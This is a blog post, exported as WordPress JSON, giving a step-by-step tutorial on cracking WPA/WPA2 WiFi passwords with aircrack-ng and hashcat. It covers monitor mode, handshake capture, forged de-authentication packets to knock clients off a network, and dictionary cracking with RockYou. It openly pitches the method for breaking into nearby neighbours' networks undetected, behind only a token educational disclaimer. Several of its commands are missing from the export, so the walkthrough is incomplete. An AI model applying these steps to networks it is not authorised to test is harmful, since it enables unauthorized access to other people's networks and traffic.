{"id":5961,"date":"2022-01-02T22:31:46","date_gmt":"2022-01-02T22:31:46","guid":{"rendered":"https:\/\/www.securedyou.com\/?p=5961"},"modified":"2022-01-03T23:43:08","modified_gmt":"2022-01-03T23:43:08","slug":"how-to-hack-wpa-wpa2-wifi-passwords-hashcat-aircrack-ng","status":"publish","type":"post","link":"https:\/\/www.securedyou.com\/how-to-hack-wpa-wpa2-wifi-passwords-hashcat-aircrack-ng\/","title":{"rendered":"How to Crack WPA\/WPA2 WiFi Password with Hashcat\/Aircrack-ng"},"content":{"rendered":"
<\/p>\n
In this guide, we are going to help you out how you can crack WiFi networks<\/a> using two of the best wireless hacking tools<\/a> that are secured by using a weak password. We will be detailing step-by-step on how you can hack WPA2 using aircrack-ng and hashcat, though it is not exhaustive. This is going to be enough information for the users to test their network security or break into one that is near.<\/p>\n The attack that has been outlined below is entirely passive and is impossible to detect provided that the password that has been cracked is not going to be used by you. To speed up the reconnaissance process an optional de-authentication attack can be used plus you can know more about it till the end of the guide<\/p>\n If somehow you have a little know-how regarding this process, then you do not need to know the descriptions just jump to the list of commands that have been used at the bottom.<\/p>\n Note: <\/strong>Do keep one thing in your mind that this tutorial is only for educational purposes and should not be used for any illegal activity and the author is not responsible for any kind of use.<\/p>\n You need to begin with listing the wireless interactions that support monitor mode with:<\/p>\n Airmon-ng<\/em><\/strong><\/p>\n If no interface is listed, then it means that your wireless card does not provide support to the monitor mode. We can assume that the name of wireless interface is wlan@ be sure to use the correct name if it differs from this, then we are going to place the interface in the monitor mode:<\/p>\n Airmon-ng start wlan@<\/em><\/strong><\/p>\n After this, you need to run iwconfig. You shall now be able to see a new monitor mode listed like mon@<\/strong> or wlan@<\/strong>.<\/p>\n Find your target<\/strong><\/p>\n You need to start listening to the 802.11 Beacon frames that are broadcasted by the near wireless routers by using your monitor interface:<\/p>\n Airodump-ng mon@<\/em><\/strong><\/p>\n You are going to see the following output:<\/p>\n CH 13 ][ Elapsed: 52 s ][ 2022\u201301\u201302 17:00<\/em><\/strong><\/p>\n BSSID PWR Beacons #Data, #\/s CH MB ENC CIPHER AUTH ESSID<\/em><\/strong><\/p>\n 14:91:82:F7:52:EB -66 205 26 0 1 54e OPN belkin.2e8.guests<\/em><\/p>\n 14:91:82:F7:52:E8 -64 212 56 0 1 54e WPA2 CCMP PSK belkin.2e8<\/em><\/p>\n 14:22:DB:1A:DB:64 -81 44 7 0 1 54 WPA2 CCMP <length: 0><\/em><\/p>\n 14:22:DB:1A:DB:66 -83 48 0 0 1 54e. WPA2 CCMP PSK securedyou<\/em><\/p>\n 9C:5C:8E:C9:AB:C0 -81 19 0 0 3 54e WPA2 CCMP PSK securedyou<\/em><\/p>\n 00:23:69:AD:AF:94 -82 350 4 0 1 54e WPA2 CCMP PSK SecuredYou is the best<\/em><\/p>\n 06:26:BB:75:ED:69 -84 232 0 0 1 54e. WPA2 CCMP PSK HH2<\/em><\/p>\n 78:71:9C:99:67:D0 -82 339 0 0 1 54e. WPA2 CCMP PSK ARRIS-67D2<\/em><\/p>\n 9C:34:26:9F:2E:E8 -85 40 0 0 1 54e. WPA2 CCMP PSK Comcast_2EEA-EXT<\/em><\/p>\n BC:EE:7B:8F:48:28 -85 119 10 0 1 54e WPA2 CCMP PSK root<\/em><\/p>\n EC:1A:59:36:AD:CA -86 210 28 0 1 54e WPA2 CCMP PSK belkin.dca<\/em><\/p>\n Now we are going to crack the password of a network by the name securedyou. You need to remember the BSSID MAC address as well as the channel (CH) number as it is displayed by Airodump-ng as we require both of them for the next step.<\/p>\n SEE ALSO:<\/strong> How to Hack WPA3 WiFi Network Passwords in 2022 (Tutorial)<\/a>.<\/p>\n The WPA or WPA2 uses a 4-way handshake to authenticate devices to the network. You do not need to know what it means, but you need to capture one of these handshakes to crack the network password. Handshakes take place when a device connects with the network like when your neighbors come home we can capture this handshake by directing airmon-ng to monitor traffic on the target by using the channel as well as bssid values that came from the last command.<\/p>\n Once you have captured the handshake you need to see something like {WPA handshake: bc: d3: c9: ef : d2: 67 there is the top right of the screen, just right of the current time.<\/p>\n If you feel impatient and are comfortable with using the active attack, then you can force the devices to connect towards the target network to reconnect by sending malicious de-authentication packets towards them. This results in the capture of a 4-way handshake.<\/p>\n Once the handshake has been captured, you need to press ctrl-c to quit airodump-ng. You shall see a .cap file where you told airodump-ng to save the capture that is called -01.Cap. We are going to use this capture file to crack the network password. We are going to rename this file to reflect the network name that we are trying to crack:<\/p>\n Mv .\/-01.cap securedyou.cap<\/em><\/strong><\/p>\n SEE ALSO:<\/strong> How to Secure your WiFi Routers from being hacked<\/a>.<\/p>\n The last step is going to crack the password by using the captured handshake. If you have got access to a GPU, it is highly recommended to use the hashcat for password cracking. We have created a tool that makes the hashcat very easy to use known as the na\u00efve-hashcat.<\/p>\n If you do not have access towards the GPU, then you can find many GPU cracking services that can be used like the GPUHASH.me or OnlineHashCrack. You can also use CPU cracking with the Aircrack-ng. However, if you want to save time and use most of your GPU then you should overclock your GPU to speed up the brute-forcing<\/a>.<\/p>\n Keep in mind that both the ways below assume a weal user-generated password. Many of the WPA or WPA2 router comes with a string 12 character random passwords that most of the users leave unchanged. We recommend you to use the probable wordlists WPA length dictionary files if you want to crack any one of these passwords.<\/p>\n <\/p>\n Before you crack the password by using the na\u00efve-hashcat, you need to convert the .cap file to the equivalent hashcat file format .hccapx.\u00a0 This can be done very quickly by either uploading the .cap file to https:\/\/hashcat.net\/cap2hccapx<\/a> or by directly using cap2hccapx tool.<\/p>\n Then you need to download and run it in hashcat:<\/p>\n # downloadgit clone https:\/\/github.com\/brannondorsey\/naive-hashcat<\/em><\/strong><\/p>\n cd naive-hashcat<\/em><\/strong><\/p>\n Download a wordlist or large dictionary file:<\/p>\n Passwords Wordlist for Cracking WPA2 WiFi Passwords<\/span><\/a><\/p>\n Hashcat mode for WPA\/WPA2 which you need to set:<\/p>\n 2500 is the hashcat hash mode for WPA\/WPA2<\/em><\/strong><\/p>\n HASH_FILE=securedyou.hccapx POT_FILE=securedyou.pot HASH_TYPE=2500 .\/naive-hashcat.sh<\/em><\/strong><\/p>\n SEE ALSO:<\/strong> 10 Best WiFi Hacking Tools for Kali Linux 2022 (Free Download)<\/a>.<\/p>\n The na\u00efve-hashcat uses different attacks like rule, combination, mask and dictionary and can take almost 10 days to run against the mid-strength passwords. The cracked password is saved to hackme.pot thus you need to check this file periodically. Once the password has been cracked, you shall see something like this as the content of your POT_FILE:<\/p>\n e30a5a57fc00211fc9f57a4491508cc3:9c5c8ec9abc0:acd1b8dfd971:ASUS:securedyouhacking<\/em><\/strong><\/p>\n The last two filed that have been separated by: is the name of the network and the password respectively.<\/p>\n The aircraft-ng can also be used for dictionary attacks that are basic and run on your CPU. Before running the offense, you need a wordlist. We recommend you to use the infamous RockYou dictionary file.<\/p>\n Download RockYou Dictionary Wordlist File<\/span><\/a><\/p>\n Keep in mind that if the network password is not in the wordlist, then you shall not crack the password.<\/p>\n You shall see a KEY FOUND message in the terminal that is followed by a plain text version of the network password if the password is cracked.<\/p>\n SEE ALSO:<\/strong> 11 Best Live CD Security Linux Distros for Ethical Hacking and Penetration Testing<\/a>.<\/p>\n The de-authentication attack can send forged de-authentication packets from your machine towards the client connected to the network that you are trying to crack. The packages include fake sender addresses that appear to the client as if they were sent from the access point themselves. On the receipt of packages like these many clients likely to disconnect from the network and then reconnect immediately provided with a 4-way handshake if you are listening with airodump-ng.<\/p>\n You can use airodump-ng to monitor a specific access point (using \u2013c channel \u2013bssid MAC) unless and until you see a client (STATION) connected. A connected client looks almost like this, where is 64: BC: 0C: 48: 97: F7 the client MAC.<\/p>\n Now you need to leave airodump-ng to run and open a new terminal. We are going to use an airplay-ng command to send fake de-auth packets towards the victim client, which forces it to reconnect with the network and grab a handshake in the process hopefully.<\/p>\n You can also broadcast deauth packets to all connected clients in a wireless network using the below command:<\/p>\n SEE ALSO:<\/strong> Ethical Hacking Cheat Sheet for Professional Hackers<\/a>.<\/p>\n As soon as you send the deauth packets, you need to go back to the airodump-ng process and if there is any luck you shall be able to see something like this there on the top right [ WPA handshake: 9C: 6C: 9E: D7: 8G: C0. Now, as the handshake has been captured, you are ready to crack the network password.<\/p>\n If you are someone who learns by watching someone else doing it then below is a video version for you.<\/p>\n Hacking WPA2 Wireless Passwords using Aircrack-ng\/Hashcat<\/span><\/a><\/p>\n Alternative wireless hacking tools you could use:<\/strong><\/p>\n Disclaimer:<\/strong> This is just a simulation of how someone can crack WPA2 passwords using tools like Hashcat and Aircrack-ng. This kind of activity should only be performed in a controlled environment where permission is given. However, I do hope you enjoyed this comprehensive tutorial and have made the most out of it.<\/p>\n","protected":false},"excerpt":{"rendered":" In this guide, we are going to help you out how you can crack WiFi networks using two of the best wireless hacking tools that are secured by using a weak password. We will be detailing step-by-step on how you can hack WPA2 using aircrack-ng and hashcat, though it is not exhaustive. This is going […]<\/p>\n","protected":false},"author":1,"featured_media":5969,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[42,79],"tags":[1842,1843,1845,1844],"yoast_head":"\nThe tools needed<\/strong><\/h2>\n
\n
How to Crack WPA2 Passwords with Aircrack-ng and Hashcat (Tutorial)<\/strong><\/h2>\n
Enable Monitor Mode in your WiFi Adapter<\/strong><\/h2>\n
How to Capture a 4-way Handshake in WiFi Networks<\/strong><\/h2>\n
\n
The Real Fun: Cracking the WPA2 Pin<\/strong><\/h2>\n
Using Naive-Hashcat to do the Magic<\/strong><\/h2>\n
Using Aircrack-ng to perform Dictionary Attack<\/strong><\/h2>\n
\n
\n
Performing the De-authentication Attack<\/strong><\/h2>\n
\n
\n
\n
Video Version of the tutorial<\/strong><\/h2>\n
\n
Last Words<\/strong><\/h2>\n